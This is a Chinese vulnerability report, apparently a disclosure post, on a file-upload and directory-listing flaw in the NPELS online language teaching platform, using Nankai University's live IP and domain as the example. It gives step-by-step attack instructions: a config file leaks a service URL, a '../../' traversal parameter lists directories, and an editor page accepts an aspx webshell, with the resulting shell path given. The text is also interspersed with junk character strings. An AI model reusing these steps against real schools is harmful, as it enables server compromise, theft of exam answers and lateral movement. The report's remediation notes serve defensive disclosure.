新理念外语网络教学平台文件上传漏洞

admin

好多大学都在用这个教学平台，这个漏洞会导致直接拿到试题答案，甚至作为跳板继续渗透进入学校其他服务器中
. b1 M( f; D, \; }9 E0 G/ f3 X; @
9 l! X! ~; k& N; `  y- x. Q详细说明：
% R2 c: T/ k; z
$ A; n+ T8 J' P$ W& Z# \以南开大学的为例:
4 N7 C/ w/ |5 L7 R/ rhttp://222.30.60.3/NPELS
! M0 N9 k! D  T4 ?+ \NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
$ y4 l5 [# g1 i<setting name="Update_CommonSvr_CommonService" serializeAs="String">
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
8 a- U& N7 A( T</setting>
及版本号
* f4 [" T- x$ r  i0 l+ Y<add key="TVersion" value="1, 0, 0, 2187">
. s# h0 T0 g2 r. d9 Z1 W7 H6 ~$ Y; E</add>
: d9 e0 N$ |7 C直接访问
: Y. r3 k0 E* c' ~4 ^5 Rhttp://222.30.60.3/NPELS/CommonService.asmx
4 g: j) x/ [% d9 g" ~* H使用GetTestClientFileList操作，直接 HTTP GET 列目录：
3 q0 S- K. H) G, phttp://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
. H! h/ l1 e- \5 Q2 M进一步列目录（返回的网页很大，可以直接 wget 下来）
http://222.30.60.3/NPELS/CommonS ... List?version=../../

3 X' ~+ I8 ?5 @4 f- @4 A发现
2 y( K& C: G# t& O0 x8 j- E3 Dhttp://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
' u) O. x' t' ]* j; C可以上传，直接上传aspx木马即可，不需要改后缀名或者文件头
上传后继续列目录找到木马地址直接访问即可
+ _' O9 I2 v! k) Z! j8 I6 Z/ i
& j; a5 A, f5 N1 A# W9 r/ f# TOOXX
  y* I) I+ S7 f( D4 ~4 _; o- M
Google "新理念外语网络教学平台" 测试了几个其他的站，都有类似的列目录上传方法
" k( R9 ?  W' l4 ~8 _' [漏洞证明：

列目录：
/ W: e' [5 v, P! ?0 h: T( X: bhttp://222.30.60.3/NPELS/CommonS ... List?version=../../
文件上传：
http://222.30.60.3/npelsv/editor/editor.htm

上传木马：
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx

4 G1 d- w) f, A1 }修复方案：
2 V1 G: Z3 Z) X好像考试系统必须使用 CommonService.asmx
最好配置文件加密或者用别的方式不让它泄露出来
* j6 h( L) f( ]  x% x8 w# H6 p, w并且检查或删除各上传入口，像 http://222.30.60.3/NPELS/Upload.aspx 一样​
" M& l8 C" u% o5 I